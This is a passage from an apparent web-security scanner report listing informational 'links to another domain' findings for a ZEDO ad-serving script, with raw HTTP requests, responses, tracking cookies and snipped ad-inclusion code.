Set-Cookie: FFad=27:28:28:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=91
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:50 GMT
Connection: close
Content-Length: 2676

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587464/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931208%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=27%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=27%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.185. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.15463462926349136 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFad=2:5:4:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:0,1,1:0,1,1:0,1,1:2,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:1,1,1:0,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:27 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:2:5:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=234
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:27 GMT
Connection: close
Content-Length: 2672

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=5%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=5%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.186. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.921064397747952 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=2:2:0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732|0,1,1:0,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:16 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:2:2:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=245
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:16 GMT
Connection: close
Content-Length: 2142

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=1%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=1%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.187. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5766728212914168 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFad=0:1:1:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132|0,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732|0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:13 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:0:1:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=248
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:13 GMT
Connection: close
Content-Length: 2121

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.188. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.30604341243579586 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=5:4:6:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133|2,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:15 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:5:4:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=186
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:16 GMT
Connection: close
Content-Length: 2142

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=7%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=7%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.189. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.26812006831627966 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=52:63:53:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=54:52:63:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=160
Expires: Sun, 24 Apr 2011 16:53:39 GMT
Date: Sun, 24 Apr 2011 16:50:59 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=54%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=54%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.190. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8892930572569906 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=60:51:51:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=52:60:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=67
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:47 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=52%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=52%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.191. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.22537103643743023 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=16:17:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:14 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=18:16:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=127
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:14 GMT
Connection: close
Content-Length: 2148

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5236856.2;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=904952%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=18%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=18%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.192. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.48420323876527604 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=14:12:12:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:01 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=13:14:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:01 GMT
Connection: close
Content-Length: 2103

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.33;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929078%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=13%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=13%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.193. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.18531027677477674 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=14:15:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:05 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:14:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=137
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:05 GMT
Connection: close
Content-Length: 2152

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5236856.2;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=904952%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=16%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=16%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.194. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9592094383110872 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
